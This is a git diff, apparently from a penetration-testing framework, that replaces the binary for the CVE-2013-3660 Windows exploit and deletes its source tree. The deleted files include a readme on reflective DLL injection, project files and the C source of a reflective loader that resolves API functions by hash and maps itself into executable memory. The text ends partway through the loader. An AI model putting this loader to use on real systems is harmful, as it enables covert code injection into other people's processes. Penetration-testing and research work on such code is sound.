diff --git a/data/exploits/cve-2013-3660/exploit.dll b/data/exploits/cve-2013-3660/exploit.dll
deleted file mode 100755
index cbb761b568..0000000000
Binary files a/data/exploits/cve-2013-3660/exploit.dll and /dev/null differ
diff --git a/data/exploits/cve-2013-3660/ppr_flatten_rec.x86.dll b/data/exploits/cve-2013-3660/ppr_flatten_rec.x86.dll
new file mode 100755
index 0000000000..888d31339a
Binary files /dev/null and b/data/exploits/cve-2013-3660/ppr_flatten_rec.x86.dll differ
diff --git a/external/source/exploits/cve-2013-3660/LICENSE.txt b/external/source/exploits/cve-2013-3660/LICENSE.txt
deleted file mode 100755
index f217025f51..0000000000
--- a/external/source/exploits/cve-2013-3660/LICENSE.txt
+++ /dev/null
@@ -1,25 +0,0 @@
-Copyright (c) 2011, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
-All rights reserved.
-
-Redistribution and use in source and binary forms, with or without modification, are permitted
-provided that the following conditions are met:
-
- * Redistributions of source code must retain the above copyright notice, this list of
-conditions and the following disclaimer.
-
- * Redistributions in binary form must reproduce the above copyright notice, this list of
-conditions and the following disclaimer in the documentation and/or other materials provided
-with the distribution.
-
- * Neither the name of Harmony Security nor the names of its contributors may be used to
-endorse or promote products derived from this software without specific prior written permission.
-
-THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
-IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
-FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
-CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
-CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
-SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
-THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
-OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
-POSSIBILITY OF SUCH DAMAGE.
\ No newline at end of file
diff --git a/external/source/exploits/cve-2013-3660/Readme.md b/external/source/exploits/cve-2013-3660/Readme.md
deleted file mode 100755
index 8670897457..0000000000
--- a/external/source/exploits/cve-2013-3660/Readme.md
+++ /dev/null
@@ -1,71 +0,0 @@
-About
-=====
-
-Reflective DLL injection is a library injection technique in which the concept
-of reflective programming is employed to perform the loading of a library from
-memory into a host process. As such the library is responsible for loading
-itself by implementing a minimal Portable Executable (PE) file loader. It can
-then govern, with minimal interaction with the host system and process, how it
-will load and interact with the host.
-
-Injection works from Windows NT4 up to and including Windows 8, running on x86,
-x64 and ARM where applicable.
-
-Overview
-========
-
-The process of remotely injecting a library into a process is two fold. Firstly,
-the library you wish to inject must be written into the address space of the
-target process (Herein referred to as the host process). Secondly the library
-must be loaded into that host process in such a way that the library's run time
-expectations are met, such as resolving its imports or relocating it to a
-suitable location in memory.
-
-Assuming we have code execution in the host process and the library we wish to
-inject has been written into an arbitrary location of memory in the host
-process, Reflective DLL Injection works as follows.
-
-* Execution is passed, either via CreateRemoteThread() or a tiny bootstrap
-shellcode, to the library's ReflectiveLoader function which is an exported
-function found in the library's export table.
-* As the library's image will currently exists in an arbitrary location in
-memory the ReflectiveLoader will first calculate its own image's current
-location in memory so as to be able to parse its own headers for use later on.
-* The ReflectiveLoader will then parse the host processes kernel32.dll export
-table in order to calculate the addresses of three functions required by the
-loader, namely LoadLibraryA, GetProcAddress and VirtualAlloc.
-* The ReflectiveLoader will now allocate a continuous region of memory into
-which it will proceed to load its own image. The location is not important as
-the loader will correctly relocate the image later on.
-The library's headers and sections are loaded into their new locations in
-memory.
-* The ReflectiveLoader will then process the newly loaded copy of its image's
-import table, loading any additional library's and resolving their respective
-imported function addresses.
-* The ReflectiveLoader will then process the newly loaded copy of its image's
-relocation table.
-* The ReflectiveLoader will then call its newly loaded image's entry point
-function, DllMain with DLL_PROCESS_ATTACH. The library has now been successfully
-loaded into memory.
-* Finally the ReflectiveLoader will return execution to the initial bootstrap
-shellcode which called it, or if it was called via CreateRemoteThread, the
-thread will terminate.
-
-Build
-=====
-
-Open the 'rdi.sln' file in Visual Studio C++ and build the solution in Release
-mode to make inject.exe and reflective_dll.dll
-
-Usage
-=====
-
-To test use the inject.exe to inject reflective_dll.dll into a host process via
-a process id, e.g.:
-
-> inject.exe 1234
-
-License
-=======
-
-Licensed under a 3 clause BSD license, please see LICENSE.txt for details.
diff --git a/external/source/exploits/cve-2013-3660/dll/reflective_dll.sln b/external/source/exploits/cve-2013-3660/dll/reflective_dll.sln
deleted file mode 100755
index eff992d77c..0000000000
--- a/external/source/exploits/cve-2013-3660/dll/reflective_dll.sln
+++ /dev/null
@@ -1,20 +0,0 @@
-
-Microsoft Visual Studio Solution File, Format Version 10.00
-# Visual C++ Express 2008
-Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "reflective_dll", "reflective_dll.vcproj", "{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}"
-EndProject
-Global
- GlobalSection(SolutionConfigurationPlatforms) = preSolution
- Debug|Win32 = Debug|Win32
- Release|Win32 = Release|Win32
- EndGlobalSection
- GlobalSection(ProjectConfigurationPlatforms) = postSolution
- {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|Win32.ActiveCfg = Release|Win32
- {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|Win32.Build.0 = Release|Win32
- {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|Win32.ActiveCfg = Release|Win32
- {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|Win32.Build.0 = Release|Win32
- EndGlobalSection
- GlobalSection(SolutionProperties) = preSolution
- HideSolutionNode = FALSE
- EndGlobalSection
-EndGlobal
diff --git a/external/source/exploits/cve-2013-3660/dll/reflective_dll.vcproj b/external/source/exploits/cve-2013-3660/dll/reflective_dll.vcproj
deleted file mode 100755
index 33c6bd9515..0000000000
--- a/external/source/exploits/cve-2013-3660/dll/reflective_dll.vcproj
+++ /dev/null
@@ -1,357 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
diff --git a/external/source/exploits/cve-2013-3660/dll/reflective_dll.vcxproj b/external/source/exploits/cve-2013-3660/dll/reflective_dll.vcxproj
deleted file mode 100755
index ed6cacb681..0000000000
--- a/external/source/exploits/cve-2013-3660/dll/reflective_dll.vcxproj
+++ /dev/null
@@ -1,266 +0,0 @@
-
-
-
-
- Debug
- ARM
-
-
- Debug
- Win32
-
-
- Debug
- x64
-
-
- Release
- ARM
-
-
- Release
- Win32
-
-
- Release
- x64
-
-
-
- {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}
- reflective_dll
- Win32Proj
-
-
-
- DynamicLibrary
- v100
- MultiByte
- true
-
-
- DynamicLibrary
- v110
- MultiByte
- true
-
-
- DynamicLibrary
- v110
- Unicode
-
-
- DynamicLibrary
- v110
- Unicode
-
-
- DynamicLibrary
- v110
- MultiByte
- false
-
-
- DynamicLibrary
- v110
- Unicode
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
- <_ProjectFileVersion>11.0.50727.1
-
-
- $(SolutionDir)$(Configuration)\
- $(Configuration)\
- true
-
-
- true
-
-
- $(SolutionDir)$(Platform)\$(Configuration)\
- $(Platform)\$(Configuration)\
- true
-
-
- $(SolutionDir)$(Configuration)\
- $(Configuration)\
- false
- exploit
-
-
- false
-
-
- $(SolutionDir)$(Platform)\$(Configuration)\
- $(Platform)\$(Configuration)\
- false
-
-
-
- Disabled
- WIN32;_DEBUG;_WINDOWS;_USRDLL;REFLECTIVE_DLL_EXPORTS;%(PreprocessorDefinitions)
- true
- EnableFastChecks
- MultiThreadedDebugDLL
-
- Level3
- EditAndContinue
-
-
- true
- Windows
- MachineX86
-
-
-
-
- Disabled
- WIN32;_DEBUG;_WINDOWS;_USRDLL;REFLECTIVE_DLL_EXPORTS;%(PreprocessorDefinitions)
- true
- EnableFastChecks
- MultiThreadedDebugDLL
-
-
- Level3
- EditAndContinue
-
-
- true
- Windows
-
-
-
-
- X64
-
-
- Disabled
- WIN32;_DEBUG;_WINDOWS;_USRDLL;REFLECTIVE_DLL_EXPORTS;%(PreprocessorDefinitions)
- true
- EnableFastChecks
- MultiThreadedDebugDLL
-
- Level3
- ProgramDatabase
-
-
- true
- Windows
- MachineX64
-
-
-
-
- MaxSpeed
- OnlyExplicitInline
- true
- WIN32;NDEBUG;_WINDOWS;_USRDLL;WIN_X86;REFLECTIVE_DLL_EXPORTS;REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR;REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN;%(PreprocessorDefinitions)
- MultiThreaded
- true
-
- Level3
- ProgramDatabase
-
-
- true
- Windows
- true
- true
- MachineX86
-
-
-
-
-
-
-
-
- MinSpace
- OnlyExplicitInline
- true
- WIN32;NDEBUG;_WINDOWS;_USRDLL;WIN_ARM;REFLECTIVE_DLL_EXPORTS;REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR;REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN;%(PreprocessorDefinitions)
- MultiThreaded
- true
-
-
- Level3
- ProgramDatabase
- true
- Default
-
-
- true
- Windows
- true
- true
- $(OutDir)$(ProjectName).arm.dll
-
-
- copy ..\ARM\Release\reflective_dll.arm.dll ..\bin\
-
-
-
-
- X64
-
-
- MaxSpeed
- OnlyExplicitInline
- true
- Size
- false
- WIN64;NDEBUG;_WINDOWS;_USRDLL;REFLECTIVE_DLL_EXPORTS;WIN_X64;REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR;REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN;%(PreprocessorDefinitions)
- MultiThreaded
- true
-
- Level3
- ProgramDatabase
- CompileAsCpp
-
-
- $(OutDir)$(ProjectName).x64.dll
- true
- Windows
- true
- true
- MachineX64
-
-
- copy $(OutDir)$(ProjectName).x64.dll ..\bin\
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
\ No newline at end of file
diff --git a/external/source/exploits/cve-2013-3660/dll/reflective_dll.vcxproj.filters b/external/source/exploits/cve-2013-3660/dll/reflective_dll.vcxproj.filters
deleted file mode 100755
index 15f7cbf646..0000000000
--- a/external/source/exploits/cve-2013-3660/dll/reflective_dll.vcxproj.filters
+++ /dev/null
@@ -1,32 +0,0 @@
-
-
-
-
- {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
- cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
-
-
- {93995380-89BD-4b04-88EB-625FBE52EBFB}
- h;hpp;hxx;hm;inl;inc;xsd
-
-
-
-
- Source Files
-
-
- Source Files
-
-
-
-
- Header Files
-
-
- Header Files
-
-
- Header Files
-
-
-
\ No newline at end of file
diff --git a/external/source/exploits/cve-2013-3660/dll/src/ReflectiveDLLInjection.h b/external/source/exploits/cve-2013-3660/dll/src/ReflectiveDLLInjection.h
deleted file mode 100755
index 5738497f5b..0000000000
--- a/external/source/exploits/cve-2013-3660/dll/src/ReflectiveDLLInjection.h
+++ /dev/null
@@ -1,51 +0,0 @@
-//===============================================================================================//
-// Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
-// All rights reserved.
-//
-// Redistribution and use in source and binary forms, with or without modification, are permitted
-// provided that the following conditions are met:
-//
-// * Redistributions of source code must retain the above copyright notice, this list of
-// conditions and the following disclaimer.
-//
-// * Redistributions in binary form must reproduce the above copyright notice, this list of
-// conditions and the following disclaimer in the documentation and/or other materials provided
-// with the distribution.
-//
-// * Neither the name of Harmony Security nor the names of its contributors may be used to
-// endorse or promote products derived from this software without specific prior written permission.
-//
-// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
-// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
-// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
-// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
-// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
-// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
-// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
-// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
-// POSSIBILITY OF SUCH DAMAGE.
-//===============================================================================================//
-#ifndef _REFLECTIVEDLLINJECTION_REFLECTIVEDLLINJECTION_H
-#define _REFLECTIVEDLLINJECTION_REFLECTIVEDLLINJECTION_H
-//===============================================================================================//
-#define WIN32_LEAN_AND_MEAN
-#include
-
-// we declare some common stuff in here...
-
-#define DLL_QUERY_HMODULE 6
-
-#define DEREF( name )*(UINT_PTR *)(name)
-#define DEREF_64( name )*(DWORD64 *)(name)
-#define DEREF_32( name )*(DWORD *)(name)
-#define DEREF_16( name )*(WORD *)(name)
-#define DEREF_8( name )*(BYTE *)(name)
-
-typedef DWORD (WINAPI * REFLECTIVELOADER)( VOID );
-typedef BOOL (WINAPI * DLLMAIN)( HINSTANCE, DWORD, LPVOID );
-
-#define DLLEXPORT __declspec( dllexport )
-
-//===============================================================================================//
-#endif
-//===============================================================================================//
diff --git a/external/source/exploits/cve-2013-3660/dll/src/ReflectiveLoader.c b/external/source/exploits/cve-2013-3660/dll/src/ReflectiveLoader.c
deleted file mode 100755
index 594c0b8066..0000000000
--- a/external/source/exploits/cve-2013-3660/dll/src/ReflectiveLoader.c
+++ /dev/null
@@ -1,496 +0,0 @@
-//===============================================================================================//
-// Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
-// All rights reserved.
-//
-// Redistribution and use in source and binary forms, with or without modification, are permitted
-// provided that the following conditions are met:
-//
-// * Redistributions of source code must retain the above copyright notice, this list of
-// conditions and the following disclaimer.
-//
-// * Redistributions in binary form must reproduce the above copyright notice, this list of
-// conditions and the following disclaimer in the documentation and/or other materials provided
-// with the distribution.
-//
-// * Neither the name of Harmony Security nor the names of its contributors may be used to
-// endorse or promote products derived from this software without specific prior written permission.
-//
-// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
-// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
-// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
-// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
-// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
-// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
-// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
-// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
-// POSSIBILITY OF SUCH DAMAGE.
-//===============================================================================================//
-#include "ReflectiveLoader.h"
-//===============================================================================================//
-// Our loader will set this to a pseudo correct HINSTANCE/HMODULE value
-HINSTANCE hAppInstance = NULL;
-//===============================================================================================//
-#pragma intrinsic( _ReturnAddress )
-// This function can not be inlined by the compiler or we will not get the address we expect. Ideally
-// this code will be compiled with the /O2 and /Ob1 switches. Bonus points if we could take advantage of
-// RIP relative addressing in this instance but I dont believe we can do so with the compiler intrinsics
-// available (and no inline asm available under x64).
-__declspec(noinline) ULONG_PTR caller( VOID ) { return (ULONG_PTR)_ReturnAddress(); }
-//===============================================================================================//
-
-// Note 1: If you want to have your own DllMain, define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN,
-// otherwise the DllMain at the end of this file will be used.
-
-// Note 2: If you are injecting the DLL via LoadRemoteLibraryR, define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR,
-// otherwise it is assumed you are calling the ReflectiveLoader via a stub.
-
-// This is our position independent reflective DLL loader/injector
-#ifdef REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
-DLLEXPORT ULONG_PTR WINAPI ReflectiveLoader( LPVOID lpParameter )
-#else
-DLLEXPORT ULONG_PTR WINAPI ReflectiveLoader( VOID )
-#endif
-{
- // the functions we need
- LOADLIBRARYA pLoadLibraryA = NULL;
- GETPROCADDRESS pGetProcAddress = NULL;
- VIRTUALALLOC pVirtualAlloc = NULL;
- NTFLUSHINSTRUCTIONCACHE pNtFlushInstructionCache = NULL;
-
- USHORT usCounter;
-
- // the initial location of this image in memory
- ULONG_PTR uiLibraryAddress;
- // the kernels base address and later this images newly loaded base address
- ULONG_PTR uiBaseAddress;
-
- // variables for processing the kernels export table
- ULONG_PTR uiAddressArray;
- ULONG_PTR uiNameArray;
- ULONG_PTR uiExportDir;
- ULONG_PTR uiNameOrdinals;
- DWORD dwHashValue;
-
- // variables for loading this image
- ULONG_PTR uiHeaderValue;
- ULONG_PTR uiValueA;
- ULONG_PTR uiValueB;
- ULONG_PTR uiValueC;
- ULONG_PTR uiValueD;
- ULONG_PTR uiValueE;
-
- // STEP 0: calculate our images current base address
-
- // we will start searching backwards from our callers return address.
- uiLibraryAddress = caller();
-
- // loop through memory backwards searching for our images base address
- // we dont need SEH style search as we shouldnt generate any access violations with this
- while( TRUE )
- {
- if( ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_magic == IMAGE_DOS_SIGNATURE )
- {
- uiHeaderValue = ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew;
- // some x64 dll's can trigger a bogus signature (IMAGE_DOS_SIGNATURE == 'POP r10'),
- // we sanity check the e_lfanew with an upper threshold value of 1024 to avoid problems.
- if( uiHeaderValue >= sizeof(IMAGE_DOS_HEADER) && uiHeaderValue < 1024 )
- {
- uiHeaderValue += uiLibraryAddress;
- // break if we have found a valid MZ/PE header
- if( ((PIMAGE_NT_HEADERS)uiHeaderValue)->Signature == IMAGE_NT_SIGNATURE )
- break;
- }
- }
- uiLibraryAddress--;
- }
-
- // STEP 1: process the kernels exports for the functions our loader needs...
-
- // get the Process Enviroment Block
-#ifdef WIN_X64
- uiBaseAddress = __readgsqword( 0x60 );
-#else
-#ifdef WIN_X86
- uiBaseAddress = __readfsdword( 0x30 );
-#else WIN_ARM
- uiBaseAddress = *(DWORD *)( (BYTE *)_MoveFromCoprocessor( 15, 0, 13, 0, 2 ) + 0x30 );
-#endif
-#endif
-
- // get the processes loaded modules. ref: http://msdn.microsoft.com/en-us/library/aa813708(VS.85).aspx
- uiBaseAddress = (ULONG_PTR)((_PPEB)uiBaseAddress)->pLdr;
-
- // get the first entry of the InMemoryOrder module list
- uiValueA = (ULONG_PTR)((PPEB_LDR_DATA)uiBaseAddress)->InMemoryOrderModuleList.Flink;
- while( uiValueA )
- {
- // get pointer to current modules name (unicode string)
- uiValueB = (ULONG_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->BaseDllName.pBuffer;
- // set bCounter to the length for the loop
- usCounter = ((PLDR_DATA_TABLE_ENTRY)uiValueA)->BaseDllName.Length;
- // clear uiValueC which will store the hash of the module name
- uiValueC = 0;
-
- // compute the hash of the module name...
- do
- {
- uiValueC = ror( (DWORD)uiValueC );
- // normalize to uppercase if the madule name is in lowercase
- if( *((BYTE *)uiValueB) >= 'a' )
- uiValueC += *((BYTE *)uiValueB) - 0x20;
- else
- uiValueC += *((BYTE *)uiValueB);
- uiValueB++;
- } while( --usCounter );
-
- // compare the hash with that of kernel32.dll
- if( (DWORD)uiValueC == KERNEL32DLL_HASH )
- {
- // get this modules base address
- uiBaseAddress = (ULONG_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->DllBase;
-
- // get the VA of the modules NT Header
- uiExportDir = uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew;
-
- // uiNameArray = the address of the modules export directory entry
- uiNameArray = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ];
-
- // get the VA of the export directory
- uiExportDir = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress );
-
- // get the VA for the array of name pointers
- uiNameArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNames );
-
- // get the VA for the array of name ordinals
- uiNameOrdinals = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNameOrdinals );
-
- usCounter = 3;
-
- // loop while we still have imports to find
- while( usCounter > 0 )
- {
- // compute the hash values for this function name
- dwHashValue = hash( (char *)( uiBaseAddress + DEREF_32( uiNameArray ) ) );
-
- // if we have found a function we want we get its virtual address
- if( dwHashValue == LOADLIBRARYA_HASH || dwHashValue == GETPROCADDRESS_HASH || dwHashValue == VIRTUALALLOC_HASH )
- {
- // get the VA for the array of addresses
- uiAddressArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions );
-
- // use this functions name ordinal as an index into the array of name pointers
- uiAddressArray += ( DEREF_16( uiNameOrdinals ) * sizeof(DWORD) );
-
- // store this functions VA
- if( dwHashValue == LOADLIBRARYA_HASH )
- pLoadLibraryA = (LOADLIBRARYA)( uiBaseAddress + DEREF_32( uiAddressArray ) );
- else if( dwHashValue == GETPROCADDRESS_HASH )
- pGetProcAddress = (GETPROCADDRESS)( uiBaseAddress + DEREF_32( uiAddressArray ) );
- else if( dwHashValue == VIRTUALALLOC_HASH )
- pVirtualAlloc = (VIRTUALALLOC)( uiBaseAddress + DEREF_32( uiAddressArray ) );
-
- // decrement our counter
- usCounter--;
- }
-
- // get the next exported function name
- uiNameArray += sizeof(DWORD);
-
- // get the next exported function name ordinal
- uiNameOrdinals += sizeof(WORD);
- }
- }
- else if( (DWORD)uiValueC == NTDLLDLL_HASH )
- {
- // get this modules base address
- uiBaseAddress = (ULONG_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->DllBase;
-
- // get the VA of the modules NT Header
- uiExportDir = uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew;
-
- // uiNameArray = the address of the modules export directory entry
- uiNameArray = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ];
-
- // get the VA of the export directory
- uiExportDir = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress );
-
- // get the VA for the array of name pointers
- uiNameArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNames );
-
- // get the VA for the array of name ordinals
- uiNameOrdinals = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNameOrdinals );
-
- usCounter = 1;
-
- // loop while we still have imports to find
- while( usCounter > 0 )
- {
- // compute the hash values for this function name
- dwHashValue = hash( (char *)( uiBaseAddress + DEREF_32( uiNameArray ) ) );
-
- // if we have found a function we want we get its virtual address
- if( dwHashValue == NTFLUSHINSTRUCTIONCACHE_HASH )
- {
- // get the VA for the array of addresses
- uiAddressArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions );
-
- // use this functions name ordinal as an index into the array of name pointers
- uiAddressArray += ( DEREF_16( uiNameOrdinals ) * sizeof(DWORD) );
-
- // store this functions VA
- if( dwHashValue == NTFLUSHINSTRUCTIONCACHE_HASH )
- pNtFlushInstructionCache = (NTFLUSHINSTRUCTIONCACHE)( uiBaseAddress + DEREF_32( uiAddressArray ) );
-
- // decrement our counter
- usCounter--;
- }
-
- // get the next exported function name
- uiNameArray += sizeof(DWORD);
-
- // get the next exported function name ordinal
- uiNameOrdinals += sizeof(WORD);
- }
- }
-
- // we stop searching when we have found everything we need.
- if( pLoadLibraryA && pGetProcAddress && pVirtualAlloc && pNtFlushInstructionCache )
- break;
-
- // get the next entry
- uiValueA = DEREF( uiValueA );
- }
-
- // STEP 2: load our image into a new permanent location in memory...
-
- // get the VA of the NT Header for the PE to be loaded
- uiHeaderValue = uiLibraryAddress + ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew;
-
- // allocate all the memory for the DLL to be loaded into. we can load at any address because we will
- // relocate the image. Also zeros all memory and marks it as READ, WRITE and EXECUTE to avoid any problems.
- uiBaseAddress = (ULONG_PTR)pVirtualAlloc( NULL, ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfImage, MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE );
-
- // we must now copy over the headers
- uiValueA = ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfHeaders;
- uiValueB = uiLibraryAddress;
- uiValueC = uiBaseAddress;
-
- while( uiValueA-- )
- *(BYTE *)uiValueC++ = *(BYTE *)uiValueB++;
-
- // STEP 3: load in all of our sections...
-
- // uiValueA = the VA of the first section
- uiValueA = ( (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader + ((PIMAGE_NT_HEADERS)uiHeaderValue)->FileHeader.SizeOfOptionalHeader );
-
- // itterate through all sections, loading them into memory.
- uiValueE = ((PIMAGE_NT_HEADERS)uiHeaderValue)->FileHeader.NumberOfSections;
- while( uiValueE-- )
- {
- // uiValueB is the VA for this section
- uiValueB = ( uiBaseAddress + ((PIMAGE_SECTION_HEADER)uiValueA)->VirtualAddress );
-
- // uiValueC if the VA for this sections data
- uiValueC = ( uiLibraryAddress + ((PIMAGE_SECTION_HEADER)uiValueA)->PointerToRawData );
-
- // copy the section over
- uiValueD = ((PIMAGE_SECTION_HEADER)uiValueA)->SizeOfRawData;
-
- while( uiValueD-- )
- *(BYTE *)uiValueB++ = *(BYTE *)uiValueC++;
-
- // get the VA of the next section
- uiValueA += sizeof( IMAGE_SECTION_HEADER );
- }
-
- // STEP 4: process our images import table...
-
- // uiValueB = the address of the import directory
- uiValueB = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_IMPORT ];
-
- // we assume their is an import table to process
- // uiValueC is the first entry in the import table
- uiValueC = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress );
-
- // itterate through all imports
- while( ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->Name )
- {
- // use LoadLibraryA to load the imported module into memory
- uiLibraryAddress = (ULONG_PTR)pLoadLibraryA( (LPCSTR)( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->Name ) );
-
- // uiValueD = VA of the OriginalFirstThunk
- uiValueD = ( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->OriginalFirstThunk );
-
- // uiValueA = VA of the IAT (via first thunk not origionalfirstthunk)
- uiValueA = ( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->FirstThunk );
-
- // itterate through all imported functions, importing by ordinal if no name present
- while( DEREF(uiValueA) )
- {
- // sanity check uiValueD as some compilers only import by FirstThunk
- if( uiValueD && ((PIMAGE_THUNK_DATA)uiValueD)->u1.Ordinal & IMAGE_ORDINAL_FLAG )
- {
- // get the VA of the modules NT Header
- uiExportDir = uiLibraryAddress + ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew;
-
- // uiNameArray = the address of the modules export directory entry
- uiNameArray = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ];
-
- // get the VA of the export directory
- uiExportDir = ( uiLibraryAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress );
-
- // get the VA for the array of addresses
- uiAddressArray = ( uiLibraryAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions );
-
- // use the import ordinal (- export ordinal base) as an index into the array of addresses
- uiAddressArray += ( ( IMAGE_ORDINAL( ((PIMAGE_THUNK_DATA)uiValueD)->u1.Ordinal ) - ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->Base ) * sizeof(DWORD) );
-
- // patch in the address for this imported function
- DEREF(uiValueA) = ( uiLibraryAddress + DEREF_32(uiAddressArray) );
- }
- else
